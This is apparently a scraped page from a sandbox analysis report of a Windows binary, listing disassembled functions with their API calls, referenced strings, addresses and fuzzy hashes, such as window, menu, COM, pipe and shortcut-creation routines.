Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: c5f406a3f56e1af55ce3ac0e89f022617a788e225b013364e96d467846d05838
Instruction ID: 3b231c6da6320ea9afb113cf2ef356134a5dcf7375903c5d491b94028f099d67
Opcode Fuzzy Hash: c5f406a3f56e1af55ce3ac0e89f022617a788e225b013364e96d467846d05838
Instruction Fuzzy Hash: 33419F65D1021C65CB21EBB4CC8A9DFB7ACAF85710F408566E618E3122FB38E255C3E5

Function 01062D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 01062D1B
GetDC.USER32(00000000), ref: 01062D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 01062D2E
ReleaseDC.USER32(00000000,00000000), ref: 01062D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01062D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01062D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,01065A65,?,?,000000FF,00000000,?,000000FF,?), ref: 01062DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 01062DE1

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 58973c690e37be8eaba8b4d869e18e1f96a5d222a962799a103443942544d8e7
Instruction ID: 045e96b28ae87bbd34d8627fc2a8f10d220145d33d6dbcba0da19db67519903a
Opcode Fuzzy Hash: 58973c690e37be8eaba8b4d869e18e1f96a5d222a962799a103443942544d8e7
Instruction Fuzzy Hash: FA318B72201214BBFB218F548C8AFEB3FADEF09715F044055FE889A291C6BA9840C7A4

Function 01054523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 01054648
VariantInit.OLEAUT32(?), ref: 01054749
VariantClear.OLEAUT32(?), ref: 01054753
VariantClear.OLEAUT32(?), ref: 010547B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0105472C
Null Object assignment in FOR..IN loop, xrefs: 010545D8, 01054706, 010547BE

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 41ca8a68a06f064554ae901a162a663b76d2c4ed3e92a5716d4edaf3e5dc328a
Instruction ID: 89c1fed37558b0c52e7f854895ce081f7e4af0a7c86d280fe371321246e3fa21
Opcode Fuzzy Hash: 41ca8a68a06f064554ae901a162a663b76d2c4ed3e92a5716d4edaf3e5dc328a
Instruction Fuzzy Hash: B7915D71A00219EBDF64CFA5C884FEFBBB8EF45714F008559E945EB281E7709985CBA0

Function 01054BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0103000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0102FF41,80070057,?,?,?,0103035E), ref: 0103002B
Part of subcall function 0103000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0102FF41,80070057,?,?), ref: 01030046
Part of subcall function 0103000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0102FF41,80070057,?,?), ref: 01030054
Part of subcall function 0103000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0102FF41,80070057,?), ref: 01030064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 01054C51
_wcslen.LIBCMT ref: 01054D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 01054DCF
CoTaskMemFree.OLE32(?), ref: 01054DDA

Strings

NULL Pointer assignment, xrefs: 01054E23, 01054E52

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: bde510c4b02b68f38242f0a54d021c507ed9eeded5cc2d98757ca16cd1043d9c
Instruction ID: 9800d67f19fda851104d9cb3db59c05eb471f059b2c1ae28cce22a8ba8247cb0
Opcode Fuzzy Hash: bde510c4b02b68f38242f0a54d021c507ed9eeded5cc2d98757ca16cd1043d9c
Instruction Fuzzy Hash: 77914771D0021DAFDF20DFA4DC90AEEBBB9BF48310F10816AE955A7251EB749A44DF60

Function 010620FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 01062183
GetMenuItemCount.USER32(00000000), ref: 010621B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 010621DD
_wcslen.LIBCMT ref: 01062213
GetMenuItemID.USER32(?,?), ref: 0106224D
GetSubMenu.USER32(?,?), ref: 0106225B

Part of subcall function 01033A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01033A57
Part of subcall function 01033A3D: GetCurrentThreadId.KERNEL32 ref: 01033A5E
Part of subcall function 01033A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,010325B3), ref: 01033A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 010622E3

Part of subcall function 0103E97B: Sleep.KERNEL32 ref: 0103E9F3

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 607ffe2d82cb595aac95196faa1454b966e113041a7bcd99eb117da0c7de3844
Instruction ID: 1bacc85326933825c6ed706574697fdb211d4470e83537e660c48c8a70184506
Opcode Fuzzy Hash: 607ffe2d82cb595aac95196faa1454b966e113041a7bcd99eb117da0c7de3844
Instruction Fuzzy Hash: 65717075E00206EFCB10DF68C845AAEBBF9EF88310F148499E996EB351D735E9418B90

Function 0103ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0103AD19
GetKeyboardState.USER32(?), ref: 0103AD2E
SetKeyboardState.USER32(?), ref: 0103AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0103ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0103ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0103AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0103AE38

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 255f225906d6ab0f09de3dd24de045f067bedda0c890e9a3470957a80f589702
Instruction ID: 527a20a00bd03e8878412d67805cb697a3a877bf4b6827a311a0279fb4720fc8
Opcode Fuzzy Hash: 255f225906d6ab0f09de3dd24de045f067bedda0c890e9a3470957a80f589702
Instruction Fuzzy Hash: E451E7A17047D57EFB379238CC59BBA7EDC5B86304F0885C8E1D6874C2D294E884D760

Function 00FF2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00FF2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00FF2D53
_ValidateLocalCookies.LIBCMT ref: 00FF2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00FF2E0C
_ValidateLocalCookies.LIBCMT ref: 00FF2E61

Strings

csm, xrefs: 00FF2DF6

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: f7bd6224d96904da030aadefab687ddf5dcda9ae10034af94941dfcf4f3fcf99
Instruction ID: 569ab40d31e24c7b9c3318080b1d97128085cae5f8a2f9048d7c8a1095877188
Opcode Fuzzy Hash: f7bd6224d96904da030aadefab687ddf5dcda9ae10034af94941dfcf4f3fcf99
Instruction Fuzzy Hash: D041B335E0020DABCF10DF68CC95ABEBBB5BF45324F148155EA14AB362D7399A05DB90

Function 01062DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 01062E1C
GetWindowLongW.USER32(?,000000F0), ref: 01062E4F
GetWindowLongW.USER32(?,000000F0), ref: 01062E84
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 01062EB6
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 01062EE0
GetWindowLongW.USER32(?,000000F0), ref: 01062EF1
SetWindowLongW.USER32(?,000000F0,00000000), ref: 01062F0B

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 66c3990766660ded6639d2566ccc3282cde3b4ecf59a489a48a07bacbf70ea5a
Instruction ID: 6c21fb142d4c51ca54f652e7aa93b939937cd6b8b8fa6433dea680f642455f71
Opcode Fuzzy Hash: 66c3990766660ded6639d2566ccc3282cde3b4ecf59a489a48a07bacbf70ea5a
Instruction Fuzzy Hash: 57312430644241AFEB21CF5CDD84FA537E8FB9A710F1501A5FA908F2A6CB76A840CB01

Function 010405A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 010405C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01040601

Strings

nul, xrefs: 01040639

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: ef4b12637e06ce83b6b084f7124312954b881a18fffddc972ef6e0d50ced975d
Instruction ID: 5629ebd9f968070f5f2e4bac6c63070a570510135bdc593f4756577f3f44d98c
Opcode Fuzzy Hash: ef4b12637e06ce83b6b084f7124312954b881a18fffddc972ef6e0d50ced975d
Instruction Fuzzy Hash: 2121A6B55003059BEB209F6DC884ADA7BE4AF89724F304A69FEE2F72D8D7719540CB50

Function 010404D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 010404F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0104052E

Strings

nul, xrefs: 01040567

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 38482ca61c329aa4e2e6dd96a007a00bb4e832336d839d5d4c0931a3eb4116d7
Instruction ID: 83678e57a6ddbc2e328ecf78d4c0ad81e1b4fd4a7a237ef8ec0ae845722d4255
Opcode Fuzzy Hash: 38482ca61c329aa4e2e6dd96a007a00bb4e832336d839d5d4c0931a3eb4116d7
Instruction Fuzzy Hash: 362171F1500305EBEB209F29D884ADB7BE4EF45724F104A69FAE1E71E8D7719540CB60

Function 010640AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FD604C
Part of subcall function 00FD600E: GetStockObject.GDI32(00000011), ref: 00FD6060
Part of subcall function 00FD600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FD606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01064112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0106411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0106412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01064139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01064145

Strings

Msctls_Progress32, xrefs: 010640E3

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 9a91ac2beabc28fa7d2c859cf71c9d82dc3e29ebc422f3c6db6d44c4dff798c9
Instruction ID: bdfef38d8b799715c2954b65a0b2d36d129f15237c00b003779cc64aef258c7f
Opcode Fuzzy Hash: 9a91ac2beabc28fa7d2c859cf71c9d82dc3e29ebc422f3c6db6d44c4dff798c9
Instruction Fuzzy Hash: FE1182B215021ABEFF219E64CC85EEB7F9DEF08798F014111FA58E6150C6769C21DBA4

Function 0104096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(01873030,01873030), ref: 0104097B
EnterCriticalSection.KERNEL32(01873010,00000000), ref: 0104098D
TerminateThread.KERNEL32(?,000001F6), ref: 0104099B
WaitForSingleObject.KERNEL32(?,000003E8), ref: 010409A9
CloseHandle.KERNEL32(?), ref: 010409B8
InterlockedExchange.KERNEL32(01873030,000001F6), ref: 010409C8
LeaveCriticalSection.KERNEL32(01873010), ref: 010409CF

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 124301a2afd15fccd5d589ee976a6a5d34fd9a63013c37bda1b6ae31525924c0
Instruction ID: 2a4db53aa06f65736638d93bfa1513b93368d33f20ae90b57cc5301fbd0b7500
Opcode Fuzzy Hash: 124301a2afd15fccd5d589ee976a6a5d34fd9a63013c37bda1b6ae31525924c0
Instruction Fuzzy Hash: B5F01D31442512BBF7615BA4EF88AD67A25BF01702F401025F281608A8C77A9465CFA0

Function 010001B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 010000BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010000D6
__allrem.LIBCMT ref: 010000ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0100010B
__allrem.LIBCMT ref: 01000122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01000140

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
Instruction ID: 1c8448dce8cc15a174d1d1ffe8294a1e8b22dd9f4545ed7bf929efcdd96bbd19
Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
Instruction Fuzzy Hash: 70811676A00B069BF7269E78CC40BAB73E9AF51764F24463EF691D72D0E774D9008B90

Function 010061FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00FF82D9,00FF82D9,?,?,?,0100644F,00000001,00000001,8BE85006), ref: 01006258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0100644F,00000001,00000001,8BE85006,?,?,?), ref: 010062DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 010063D8
__freea.LIBCMT ref: 010063E5

Part of subcall function 01003820: RtlAllocateHeap.NTDLL(00000000,?,010A1444,?,00FEFDF5,?,?,00FDA976,00000010,010A1440,00FD13FC,?,00FD13C6,?,00FD1129), ref: 01003852

__freea.LIBCMT ref: 010063EE
__freea.LIBCMT ref: 01006413

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 7034a82da91fcac003f688c616e2d4ef6f98624b6124d1c98923a4d114a2e252
Instruction ID: 3a167b4512316bd94e8d1b5198120e3360e9c942e8fa05175ecf796e2b43383e
Opcode Fuzzy Hash: 7034a82da91fcac003f688c616e2d4ef6f98624b6124d1c98923a4d114a2e252
Instruction Fuzzy Hash: DD51E872600216AFFB274E64CC81EAF7BEAEF44650F158269FD45DA1C0DB36DC50C6A0

Function 0104648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 010464DC
CoInitialize.OLE32(00000000), ref: 01046639
CoCreateInstance.OLE32(0106FCF8,00000000,00000001,0106FB68,?), ref: 01046650
CoUninitialize.OLE32 ref: 010468D4

Strings

.lnk, xrefs: 010464BA, 01046524, 010465E0

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 770ff7b04fa12457afd9275f8d781dc196aa5a72acb6287cc458275b8fb9dd2c
Instruction ID: a3e33251b70a73d90e4e002b2839a3dc012b42eb9f9258247a73c9c30c2a09be
Opcode Fuzzy Hash: 770ff7b04fa12457afd9275f8d781dc196aa5a72acb6287cc458275b8fb9dd2c
Instruction Fuzzy Hash: 7ED16AB1508301AFD310EF24C88196BB7E9FF89704F44496DF5958B2A1EB71E905CBA2

Function 010407EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0104080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 01040847
EnterCriticalSection.KERNEL32(?), ref: 01040863
LeaveCriticalSection.KERNEL32(?), ref: 010408DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 010408F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 01040921

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: e3f2411f5e59e143c30feb4dd3e3b7e0e4949e3ec578644ea4eb297f41aab457
Instruction ID: 7ebaed5da5dffe4992cf38ba1de04780f5fa6b661751ada75dad63d6d51428ef
Opcode Fuzzy Hash: e3f2411f5e59e143c30feb4dd3e3b7e0e4949e3ec578644ea4eb297f41aab457
Instruction Fuzzy Hash: FA418B71900205EBEF159F54DC81AAA77B9FF04300F1080B9EE40AA29ADB35EE54DBA0

Function 010681DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

